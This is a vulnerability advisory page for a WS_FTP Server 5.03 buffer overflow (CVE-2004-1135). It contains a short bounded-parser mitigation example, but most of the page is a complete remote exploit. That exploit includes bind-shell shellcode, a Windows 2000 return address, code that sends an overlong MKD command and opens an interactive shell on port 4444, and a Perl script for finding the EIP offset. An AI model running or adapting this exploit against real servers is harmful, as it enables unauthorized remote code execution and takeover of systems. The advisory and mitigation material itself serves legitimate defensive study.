ipswitchft WS_FTP multiple buffer overflow vulnerabilities

Vulnerability ID: 1108312    Vulnerability type: Buffer overflow
Published: 2004-11-29    Updated: 2005-01-10
CVE ID: CVE-2004-1135
CNNVD ID: CNNVD-200501-152
Platform: Windows    CVSS score: 5.0
|Vulnerability sources
https://www.exploit-db.com/exploits/664
https://www.securityfocus.com/bid/90537
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200501-152
|Vulnerability details
WS_FTP is an FTP server product. WS_FTP Server 5.03 (2004.10.14) contains multiple buffer overflow vulnerabilities. A remote attacker can crash the service by sending overlong SITE, XMKD, MKD and RNFR commands, resulting in a denial of service.
|Vulnerability EXP
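The overflow described above is the classic case of a fixed-size command buffer being filled from an attacker-controlled argument with no length check. The bounded FTP command-line parser below is an added illustration of the mitigation; it is not WS_FTP's code and not part of this advisory. The verb and argument limits (FTP_VERB_MAX, FTP_ARG_MAX), the function names and the reply strings are assumptions chosen for this example. It validates the length of a MKD/XMKD/RNFR/SITE argument before copying anything, answering an overlong argument with a 501 reply; the 954-byte MKD argument used by the exploit on this page is reproduced as constructed input so the check can be seen rejecting it.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Assumed limits for this example: RFC 959 verbs are at most four letters;
 * 255 bytes is an illustrative cap on the argument, not WS_FTP's value. */
#define FTP_VERB_MAX 4
#define FTP_ARG_MAX  255

enum ftp_parse_status {
    FTP_OK = 0,
    FTP_ERR_EMPTY,
    FTP_ERR_BAD_VERB,
    FTP_ERR_ARG_TOO_LONG,
    FTP_ERR_BAD_CHAR
};

struct ftp_cmd {
    char verb[FTP_VERB_MAX + 1];
    char arg[FTP_ARG_MAX + 1];
};

/* Parse one FTP command line such as "MKD somedir\r\n".
 * The unsafe pattern this stands in for strcpy()s the argument into a
 * fixed stack buffer; here the argument length is checked against the
 * destination size before any byte is copied, so an oversized argument
 * is refused rather than overrunning the buffer. */
enum ftp_parse_status ftp_parse_line(const char *line, struct ftp_cmd *out)
{
    size_t len = strlen(line);
    /* Strip the trailing CRLF (or bare LF). */
    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n'))
        len--;
    if (len == 0)
        return FTP_ERR_EMPTY;

    /* The verb is the leading run of letters, at most FTP_VERB_MAX long. */
    size_t i = 0;
    while (i < len && isalpha((unsigned char)line[i]))
        i++;
    if (i == 0 || i > FTP_VERB_MAX)
        return FTP_ERR_BAD_VERB;
    for (size_t k = 0; k < i; k++)
        out->verb[k] = (char)toupper((unsigned char)line[k]);
    out->verb[i] = '\0';

    /* Optional single space, then the argument up to end of line. */
    size_t a = i;
    if (a < len) {
        if (line[a] != ' ')
            return FTP_ERR_BAD_VERB;
        a++;
    }
    size_t arglen = len - a;
    if (arglen > FTP_ARG_MAX)          /* the bounds check the bug lacked */
        return FTP_ERR_ARG_TOO_LONG;
    for (size_t k = 0; k < arglen; k++) {
        unsigned char c = (unsigned char)line[a + k];
        if (c < 0x20 || c == 0x7f)      /* reject Telnet control characters */
            return FTP_ERR_BAD_CHAR;
    }
    memcpy(out->arg, line + a, arglen);
    out->arg[arglen] = '\0';
    return FTP_OK;
}

/* Map a parse result to the FTP reply line the server would send. */
const char *ftp_reply_for(enum ftp_parse_status st)
{
    switch (st) {
    case FTP_OK:               return "200 Command okay.";
    case FTP_ERR_EMPTY:        return "500 Syntax error, command unrecognized.";
    case FTP_ERR_BAD_VERB:     return "500 Syntax error, command unrecognized.";
    case FTP_ERR_ARG_TOO_LONG: return "501 Syntax error in parameters or arguments.";
    case FTP_ERR_BAD_CHAR:     return "501 Syntax error in parameters or arguments.";
    }
    return "500 Syntax error, command unrecognized.";
}

/* Constructed input: "MKD " followed by a 954-byte argument, the size the
 * exploit on this page sends. Returns the parser's verdict for it. */
enum ftp_parse_status demo_overlong_mkd(void)
{
    static char line[4 + 954 + 3];
    memcpy(line, "MKD ", 4);
    memset(line + 4, 'A', 954);
    memcpy(line + 4 + 954, "\r\n", 3);   /* includes the terminating NUL */
    struct ftp_cmd cmd;
    return ftp_parse_line(line, &cmd);
}

int main(void)
{
    struct ftp_cmd cmd;
    enum ftp_parse_status st = ftp_parse_line("MKD incoming\r\n", &cmd);
    printf("MKD incoming      -> %s (verb=%s arg=%s)\n",
           ftp_reply_for(st), cmd.verb, cmd.arg);
    st = demo_overlong_mkd();
    printf("MKD + 954 bytes   -> %s\n", ftp_reply_for(st));
    return 0;
}
```

The point of the design is that the size check happens against the destination's capacity before the copy, and that the verdict is a return value the caller can turn into a protocol reply, so an oversized MKD, XMKD, RNFR or SITE argument is logged and refused instead of ever reaching a fixed buffer.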
/*
no@0x00:~/Exploits/IPS-WSFTP$ ./IPSWSFTP-exploit 10.20.30.2 test test
***Ipswitch WS_FTP Remote buffer overflow exploit by NoPh0BiA.***
[x] Connected to: 10.20.30.2 on port 21.
[x] Sending Login..done.
[x] Sending bad code..done.
[x] Checking if exploitation was successful..
[x] Connected to: 10.20.30.2 on port 4444.
[x] 0wn3d!

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

Greetz to Reed Arvin, NtWaK0,kane,schap, and kamalo :)

*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>      /* bzero */
#include <unistd.h>       /* read, write, close, sleep */
#include <sys/socket.h>
#include <sys/select.h>   /* select, fd_set */
#include <sys/wait.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>    /* inet_addr */
#include <errno.h>

#define PORT 21
#define RPORT 4444
#define RET "\x53\x9B\x2E\x7C" /*win2k sp4*/

char shellcode[]=
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xb1\xbe"
"\x94\x1d\x83\xeb\xfc\xe2\xf4\x4d\x56\xc2\x1d\xb1\xbe\xc7\x48\xe7"
"\xe9\x1f\x71\x95\xa6\x1f\x58\x8d\x35\xc0\x18\xc9\xbf\x7e\x96\xfb"
"\xa6\x1f\x47\x91\xbf\x7f\xfe\x83\xf7\x1f\x29\x3a\xbf\x7a\x2c\x4e"
"\x42\xa5\xdd\x1d\x86\x74\x69\xb6\x7f\x5b\x10\xb0\x79\x7f\xef\x8a"
"\xc2\xb0\x09\xc4\x5f\x1f\x47\x95\xbf\x7f\x7b\x3a\xb2\xdf\x96\xeb"
"\xa2\x95\xf6\x3a\xba\x1f\x1c\x59\x55\x96\x2c\x71\xe1\xca\x40\xea"
"\x7c\x9c\x1d\xef\xd4\xa4\x44\xd5\x35\x8d\x96\xea\xb2\x1f\x46\xad"
"\x35\x8f\x96\xea\xb6\xc7\x75\x3f\xf0\x9a\xf1\x4e\x68\x1d\xda\x30"
"\x52\x94\x1c\xb1\xbe\xc3\x4b\xe2\x37\x71\xf5\x96\xbe\x94\x1d\x21"
"\xbf\x94\x1d\x07\xa7\x8c\xfa\x15\xa7\xe4\xf4\x54\xf7\x12\x54\x15"
"\xa4\xe4\xda\x15\x13\xba\xf4\x68\xb7\x61\xb0\x7a\x53\x68\x26\xe6"
"\xed\xa6\x42\x82\x8c\x94\x46\x3c\xf5\xb4\x4c\x4e\x69\x1d\xc2\x38"
"\x7d\x19\x68\xa5\xd4\x93\x44\xe0\xed\x6b\x29\x3e\x41\xc1\x19\xe8"
"\x37\x90\x93\x53\x4c\xbf\x3a\xe5\x41\xa3\xe2\xe4\x8e\xa5\xdd\xe1"
"\xee\xc4\x4d\xf1\xee\xd4\x4d\x4e\xeb\xb8\x94\x76\x8f\x4f\x4e\xe2"
"\xd6\x96\x1d\xa0\xe2\x1d\xfd\xdb\xae\xc4\x4a\x4e\xeb\xb0\x4e\xe6"
"\x41\xc1\x35\xe2\xea\xc3\xe2\xe4\x9e\x1d\xda\xd9\xfd\xd9\x59\xb1"
"\x37\x77\x9a\x4b\x8f\x54\x90\xcd\x9a\x38\x77\xa4\xe7\x67\xb6\x36"
"\x44\x17\xf1\xe5\x78\xd0\x39\xa1\xfa\xf2\xda\xf5\x9a\xa8\x1c\xb0"
"\x37\xe8\x39\xf9\x37\xe8\x39\xfd\x37\xe8\x39\xe1\x33\xd0\x39\xa1"
"\xea\xc4\x4c\xe0\xef\xd5\x4c\xf8\xef\xc5\x4e\xe0\x41\xe1\x1d\xd9"
"\xcc\x6a\xae\xa7\x41\xc1\x19\x4e\x6e\x1d\xfb\x4e\xcb\x94\x75\x1c"
"\x67\x91\xd3\x4e\xeb\x90\x94\x72\xd4\x6b\xe2\x87\x41\x47\xe2\xc4"
"\xbe\xfc\xed\x3b\xba\xcb\xe2\xe4\xba\xa5\xc6\xe2\x41\x44\x1d";

struct sockaddr_in hrm;

/* Relay stdin and the socket in both directions until either side closes. */
void shell(int sock)
{
    fd_set fd_read;
    char buff[1024];
    int n;

    while(1) {
        FD_ZERO(&fd_read);            /* reset the set on every iteration */
        FD_SET(sock,&fd_read);
        FD_SET(0,&fd_read);

        if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;

        if( FD_ISSET(sock, &fd_read) ) {
            n=read(sock,buff,sizeof(buff));
            if (n == 0) {
                printf ("Connection closed.\n");
                exit(EXIT_FAILURE);
            } else if (n < 0) {
                perror("read remote");
                exit(EXIT_FAILURE);
            }
            write(1,buff,n);
        }

        if ( FD_ISSET(0, &fd_read) ) {
            if((n=read(0,buff,sizeof(buff)))<=0){
                perror ("read user");
                exit(EXIT_FAILURE);
            }
            write(sock,buff,n);
        }
    }
    close(sock);
}

/* Open a TCP connection to ip:p and return the socket descriptor. */
int conn(char *ip,int p)
{
    int sockfd;
    hrm.sin_family = AF_INET;
    hrm.sin_addr.s_addr = inet_addr(ip);
    hrm.sin_port = htons(p);
    bzero(&(hrm.sin_zero),8);
    sockfd=socket(AF_INET,SOCK_STREAM,0);
    if(sockfd < 0)
    {
        perror("socket");
        exit(0);
    }
    if((connect(sockfd,(struct sockaddr*)&hrm,sizeof(struct sockaddr))) < 0)
    {
        perror("connect");
        exit(0);
    }

    printf("[x] Connected to: %s on port %d.\n",ip,p);

    return sockfd;
}

int main(int argc, char *argv[])
{
    printf("***Ipswitch WS_FTP Remote buffer overflow exploit by NoPh0BiA.***\n");
    if(argc<4)
    {
        fprintf(stderr,"Usage: IP USER PASS\n");
        exit(0);
    }

    /* Payload layout: 519 x 'A' | RET | 32 x 'B' | shellcode = 954 bytes
     * (one extra byte for the terminating NUL that strcat writes). */
    char *buffer=malloc(955);
    char *A=malloc(520);
    char *B=malloc(33);
    char *target=argv[1];
    char *user=malloc(32);
    char *pass=malloc(32);
    char *request=malloc(80);   /* "USER <31>\r\nPASS <31>\r\n" fits in 80 bytes */
    int x,y;
    memset(request,'\0',80);
    memset(user,'\0',32);
    memset(pass,'\0',32);
    memset(buffer,'\0',955);
    memset(A,0x41,519);
    A[519]='\0';
    memset(B,0x42,32);
    B[32]='\0';

    strncpy(user,argv[2],31);
    strncpy(pass,argv[3],31);

    strcat(buffer,A);
    strcat(buffer,RET);
    strcat(buffer,B);
    strcat(buffer,shellcode);

    sprintf(request,"USER %s\r\nPASS %s\r\n",user,pass);

    x = conn(target,PORT);
    printf("[x] Sending Login..");
    write(x,request,strlen(request));
    printf("done.\n");
    sleep(2);

    printf("[x] Sending bad code..");
    write(x,"MKD ",4);
    write(x,buffer,954);
    write(x,"\r\n",2);
    printf("done.\n");
    sleep(2);
    close(x);
    printf("[x] Checking if exploitation was successful..\n");
    y=conn(target,RPORT);
    printf("[x] 0wn3d!\n\n");
    shell(y);
    close(y);
    return 0;
}

/*
Helper script:
The following Perl script can be used to find the coordinates for A and B so that the RET address affects the EIP and the shellcode is executed.

#!/usr/bin/perl
# WS_FTP RET Address finder
# Noam Rathaus of Beyond Security Ltd.
#

use strict;
use IO::Socket::INET;

usage() unless (@ARGV >= 2);

my $host = shift(@ARGV);
my $port = shift(@ARGV);

my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to the host.\n";

$socket->autoflush(1);
# Read the banner up to the 220 greeting.
while (<$socket>)
{
    print $_;
    if (/220 /)
    {
        last;
    }
}

print $socket "USER noam\n";
while (<$socket>)
{
    print $_;
    if (/331 /)
    {
        last;
    }
}

print $socket "PASS password\n";
while (<$socket>)
{
    print $_;
    if (/230 /)
    {
        last;
    }
}

my $RET = 4;
my $size = 2000;
my $presize = shift(@ARGV) || 200;
my $postsize = shift(@ARGV) || 800;

# Pattern: pre x 'A', the 4-byte marker "DEEF", filler 'B', post x 'C'.
print $socket "MKD ".("A"x$presize)."DEEF".("B"x($size - $presize - $postsize - $RET)).("C"x$postsize)."\n";

while (<$socket>)
{
    print $_;
}

print "Done.\n";

close($socket);
exit(0);

sub usage
{
    print "\nws_ftp.pl MKD alignment assistant\n";
    print "\nUsage: ws_ftp.pl [host] [port] [pre] [post]\n";
    print "We generate something of the sorts of \"A\"xpre \"DEEF\" \"B\"x(2000-pre-post-4) \"C\"xpost.\n";
    print "You need to align your pre and post so that the EIP is DEEF 0x44454546\n";
    print "\n";
    exit(1);
}

*/

// milw0rm.com [2004-11-29]
|Affected products
Ipswitch WS FTP Server 5.03
|References

Source: XF
Name: wsftp-ftp-commands-bo(18296)
Link: http://xforce.iss.net/xforce/xfdb/18296
Source: MISC
Link: http://www.securiteam.com/exploits/6D00L2KBPG.html
Source: BUGTRAQ
Name: 20041129 Multiple buffer overlows in WS_FTP Server Version 5.03, 2004.10.14.
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=110177654524819&w=2
Source: FULLDISC
Name: 20041129 Multiple buffer overlows in WS_FTP Server Version 5.03, 2004.10.14.
Link: http://lists.grok.org.uk/pipermail/full-disclosure/2004-November/029600.html
